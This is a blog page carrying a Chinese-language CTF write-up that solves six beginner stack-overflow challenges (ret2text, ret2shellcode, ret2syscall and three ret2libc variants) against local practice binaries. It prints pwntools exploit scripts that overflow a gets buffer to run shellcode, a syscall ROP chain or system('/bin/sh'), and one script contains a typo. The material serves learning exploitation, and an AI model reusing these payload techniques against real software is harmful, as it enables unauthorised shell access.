<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.0.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha256-CTSx/A06dm1B063156EVh15m6Y67pAjZZaQc89LLSrU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"ygkldnherr.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.18.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="··········">
<meta property="og:type" content="article">
<meta property="og:title" content="一些pwn">
<meta property="og:url" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/index.html">
<meta property="og:site_name" content="ygkldnherr">
<meta property="og:description" content="··········">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2text0.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2text1.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2text2.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2text3.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2text4.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2shellcode0.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2shellcode1.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2shellcode2.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2shellcode3.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2shellcode4.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2shellcode5.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2syscall0.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2syscall1.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2syscall5.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2syscall2.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2syscall3.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2syscall4.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2syscall7.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2syscall6.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2syscall8.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc10.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc11.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc12.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc13.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc14.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc20.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc21.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc22.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc23.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc24.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc25.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc30.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc31.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc32.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc33.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc36.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc34.png">
<meta property="og:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2libc35.png">
<meta property="article:published_time" content="2023-12-05T05:35:58.000Z">
<meta property="article:modified_time" content="2024-02-05T09:22:25.000Z">
<meta property="article:author" content="ygkldnherr">
<meta property="article:tag" content="CTF wp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/ret2text0.png">


<link rel="canonical" href="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/","path":"2023/12/05/some-small-pwn-topics/","title":"一些pwn"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>一些pwn | ygkldnherr</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>

<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">ygkldnherr</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">welcome to my blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ret2text"><span class="nav-number">1.</span> <span class="nav-text">ret2text</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ret2shellcode"><span class="nav-number">2.</span> <span class="nav-text">ret2shellcode</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ret2syscall"><span class="nav-number">3.</span> <span class="nav-text">ret2syscall</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ret2libc1"><span class="nav-number">4.</span> <span class="nav-text">ret2libc1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ret2libc2"><span class="nav-number">5.</span> <span class="nav-text">ret2libc2</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ret2libc3"><span class="nav-number">6.</span> <span class="nav-text">ret2libc3</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">ygkldnherr</p>
  <div class="site-description" itemprop="description">过去无可挽回，未来可以改变</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">7</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ygkldnherr.github.io/2023/12/05/some-small-pwn-topics/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="ygkldnherr">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ygkldnherr">
      <meta itemprop="description" content="过去无可挽回，未来可以改变">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="一些pwn | ygkldnherr">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          一些pwn
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-12-05 13:35:58" itemprop="dateCreated datePublished" datetime="2023-12-05T13:35:58+08:00">2023-12-05</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2024-02-05 17:22:25" itemprop="dateModified" datetime="2024-02-05T17:22:25+08:00">2024-02-05</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>··········<span id="more"></span></p>
<h1 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h1><p>checksec<br><img src="/2023/12/05/some-small-pwn-topics/ret2text0.png"><br>32位，未开启canary，开启了NX<br>丢到ida里面看一下<br><img src="/2023/12/05/some-small-pwn-topics/ret2text1.png"></p>
<p>可以看到vulnerable函数里有gets函数，读到的值传到buffer里，距离ebp16个字节写exp<br>看到getshell函数首地址为<br><img src="/2023/12/05/some-small-pwn-topics/ret2text2.png"></p>
<p><img src="/2023/12/05/some-small-pwn-topics/ret2text3.png"></p>
<p><img src="/2023/12/05/some-small-pwn-topics/ret2text4.png"></p>
<p>打通。</p>
<h1 id="ret2shellcode"><a href="#ret2shellcode" class="headerlink" title="ret2shellcode"></a>ret2shellcode</h1><p>checksec一下<br><img src="/2023/12/05/some-small-pwn-topics/ret2shellcode0.png"><br>32位文件，未开启canary保护，未开启PIE，具有RWX段。</p>
<p>丢到ida<br><img src="/2023/12/05/some-small-pwn-topics/ret2shellcode1.png"><br>定义了一个字符型数组s，gets输入到s，并将s的0x64位字节数据赋给buf2</p>
<p>在gdb中发现gets函数的栈帧长度为0x92字，esp存储的是一个指针，可以看到数据是从0xffffd01c开始填充<br><img src="/2023/12/05/some-small-pwn-topics/ret2shellcode2.png"><br>通过python可以算出需要填充108 + 4 个垃圾字节，再加4个字节的数据——返回地址<br><img src="/2023/12/05/some-small-pwn-topics/ret2shellcode3.png"></p>
<p>找到全局变量buf2的地址<br><img src="/2023/12/05/some-small-pwn-topics/ret2shellcode4.png"></p>
<p>写脚本  </p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = process(<span class="string">"./ret2shellcode"</span>)</span><br><span class="line">shellcode = asm(shellcraft.sh())  </span><br><span class="line"><span class="comment"># asm()将参数转化为机器码， shellcraft.sh()默认生成一个面向x86的shellcode</span></span><br><span class="line">buf2_addr = <span class="number">0x0804a080</span></span><br><span class="line">io.senline = (shellcode.ljust(<span class="number">112</span>, <span class="string">b'A'</span>) + p32(buf2_addr))</span><br><span class="line"><span class="comment"># ljust()从左向右调整填充A至112</span></span><br><span class="line">io.interactive()             </span><br></pre></td></tr></tbody></table></figure>

<p>得到了本地程序的shell<br><img src="/2023/12/05/some-small-pwn-topics/ret2shellcode5.png">  </p>
<h1 id="ret2syscall"><a href="#ret2syscall" class="headerlink" title="ret2syscall"></a>ret2syscall</h1><p>checksec<br><img src="/2023/12/05/some-small-pwn-topics/ret2syscall0.png"><br>看到32位程序，开启了RELRO<br>no ret2text no ret2shellcode<br>丢到ida里<br><img src="/2023/12/05/some-small-pwn-topics/ret2syscall1.png"></p>
<p>看到gets()函数<br>v4与ebp相距0x64 = 100<br>gdb动态调试一下<br><img src="/2023/12/05/some-small-pwn-topics/ret2syscall5.png">  </p>
<p>看到填充位置与ebp相差0xa8 - 0x3c = 108<br>所以有时候ida也不太准<br>基本ROP，ret2syscall，通过gadgets构成代码拿到shell<br><img src="/2023/12/05/some-small-pwn-topics/ret2syscall2.png"><br>用ROPgadget搜索到如下gadgets<br><img src="/2023/12/05/some-small-pwn-topics/ret2syscall3.png">  </p>
<p><img src="/2023/12/05/some-small-pwn-topics/ret2syscall4.png"></p>
<p><img src="/2023/12/05/some-small-pwn-topics/ret2syscall7.png"></p>
<p><img src="/2023/12/05/some-small-pwn-topics/ret2syscall6.png"></p>
<p>写exp  </p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = process(<span class="string">"./ret2syscall"</span>)</span><br><span class="line">pop_eax = <span class="number">0x080bb196</span></span><br><span class="line">pop_edx_ecx_ebx = <span class="number">0x0806eb90</span></span><br><span class="line">bin_sh = <span class="number">0x080BE408</span></span><br><span class="line">int_80 = <span class="number">0x08049421</span></span><br><span class="line">payload = flat([<span class="string">b'A'</span>*(<span class="number">108</span> + <span class="number">4</span>), pop_eax, <span class="number">0xb</span>, pop_edx_ecx_ebx, <span class="number">0</span>, <span class="number">0</span>, bin_sh, int_80 ])</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></tbody></table></figure>

<p><img src="/2023/12/05/some-small-pwn-topics/ret2syscall8.png"></p>
<p>打通！</p>
<p>tip：  </p>
<blockquote>
<p>在笔者学习这个payload时，疑惑0xb为什么可以直接传递，搜集了一下信息，以后慢慢学。（doge）</p>
<p>在这个栈溢出攻击中，<code>0xb</code> 和 <code>"/bin/sh"</code> 之间的区别涉及到系统调用号和字符串的存储方式。</p>
<ol>
<li><strong>系统调用号（syscall number）：</strong></li>
</ol>
<ul>
<li><code>0xb</code> 是系统调用号，对应于 <code>execve</code> 系统调用。在x86体系结构中，<code>0xb</code> 对应于 <code>sys_execve</code>。</li>
<li>系统调用号通常直接作为参数传递给EAX寄存器，因此可以直接放在ROP链中。</li>
</ul>
<ol start="2">
<li><strong>字符串 “/bin/sh”：</strong></li>
</ol>
<ul>
<li><code>"/bin/sh"</code> 是一个字符串，存储在内存中的某个位置。在ROP攻击中，我们需要将该字符串的地址传递给 <code>execve</code> 系统调用的参数之一。</li>
<li>字符串本身的内容不适合直接放在ROP链中，因为ROP链需要是一系列的地址。所以我们将字符串的地址放在ROP链中，然后 <code>execve</code> 在执行时会读取该地址处的字符串。</li>
</ul>
</blockquote>
<h1 id="ret2libc1"><a href="#ret2libc1" class="headerlink" title="ret2libc1"></a>ret2libc1</h1><p>checksec<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc10.png"><br>32位程序，未开启canary，未开启PIE，开启了栈不可执行。<br>丢到ida里<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc11.png"><br>发现危险函数gets()<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc12.png"><br>函数secure()有一个system()函数但是命令”shell!?”没有任何作用，但是由于system()函数的调用，在plt表里会有system()函数对应的got表地址的表项，进而能解析出system()函数的真实地址，从而调用system()函数。</p>
<p><img src="/2023/12/05/some-small-pwn-topics/ret2libc13.png"></p>
<p>需要填充108 + 4 = 112个垃圾数据<br>写exp  </p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = process(<span class="string">"./ret2libc1"</span>)</span><br><span class="line">elf = ELF(<span class="string">"./ret2libc1"</span>)</span><br><span class="line">system_addr = elf.plt[<span class="string">"system"</span>]</span><br><span class="line">bin_sh_addr = <span class="built_in">next</span>(elf.search(<span class="string">b"/bin/sh"</span>))</span><br><span class="line"><span class="comment"># payload = b"a" * 112 + p32(system_addr) + b"aaaa" + p32(bin_sh_addr)</span></span><br><span class="line">payload = flat([<span class="string">b"a"</span>*<span class="number">112</span>, system_addr, <span class="string">b"aaaa"</span>, bin_sh_addr])</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></tbody></table></figure>

<p><img src="/2023/12/05/some-small-pwn-topics/ret2libc14.png"></p>
<p>打通！</p>
<h1 id="ret2libc2"><a href="#ret2libc2" class="headerlink" title="ret2libc2"></a>ret2libc2</h1><p>checksec<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc20.png"><br>32位程序，未开启了canary和PIE，开启了部分RELRO和栈不可执行。</p>
<p>没有后门函数，也没有足够的gadgets。</p>
<p>没有找到”/bin/sh”<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc21.png"><br><img src="/2023/12/05/some-small-pwn-topics/ret2libc22.png"><br>在全局区找到了全局变量buf2，可以劫持程序流到buf2写入”/bin/sh”再进行ROP</p>
<p>payload的结构如下<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc23.png"><img src="/2023/12/05/some-small-pwn-topics/ret2libc24.png"></p>
<p>要填充0x78 - 0x0c + 4 = 108 + 4 = 112个垃圾数据<br>写exp  </p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = process(<span class="string">"./ret2libc2"</span>)</span><br><span class="line">elf = ELF(<span class="string">"./ret2libc2"</span>)</span><br><span class="line">system_addr = elf.plt[<span class="string">"system"</span>]</span><br><span class="line">gets_addr = elf.plt[<span class="string">"gets"</span>]</span><br><span class="line">buf2_addr = <span class="number">0x0804A080</span></span><br><span class="line">payload = flat([<span class="string">b"a"</span>*<span class="number">112</span>, gets_addr, system_addr, buf2_addr, buf2_addr])</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.sendline(<span class="string">"/bin/sh"</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></tbody></table></figure>

<p> <img src="/2023/12/05/some-small-pwn-topics/ret2libc25.png"></p>
<p>打通！</p>
<h1 id="ret2libc3"><a href="#ret2libc3" class="headerlink" title="ret2libc3"></a>ret2libc3</h1><p>看到有两个文件</p>
<p>checksec ret2libc3<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc30.png"><br>32位，未开启canary和PIE</p>
<p>丢到ida里<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc31.png"><br>没有找到后门函数，又没有RWX段无法ret2text和ret2shellcode，而且没有足够的gadget所以也无法用ret2syscall，只能用ret2libc。<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc32.png"><br>栈溢出漏洞在第二个read</p>
<p>栈结构如下<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc33.png"></p>
<p>此处笔者遇到一个问题，题中给的libc文件和实际程序的所用的libc文件不一样所以分析题中所给的libc文件是无法打通的，可以利用ldd -v ret2libc3来查看程序所用的libc文件<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc36.png"><br>可以看到所用的libc为<code>libc.so.6</code>其路径为<code>/lib/i386-linux-gnu/libc.so.6</code><br>写exp<br><img src="/2023/12/05/some-small-pwn-topics/ret2libc34.png"></p>
<p><img src="/2023/12/05/some-small-pwn-topics/ret2libc35.png">  </p>
<p>打通！</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF-wp/" rel="tag"># CTF wp</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/12/01/first-exploration-ELF/" rel="prev" title="初探ELF">
                  <i class="fa fa-angle-left"></i> 初探ELF
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">ygkldnherr</span>
  </div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

-->

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  




  

  <script class="next-config" data-name="enableMath" type="application/json">true</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>



</body>
</html>
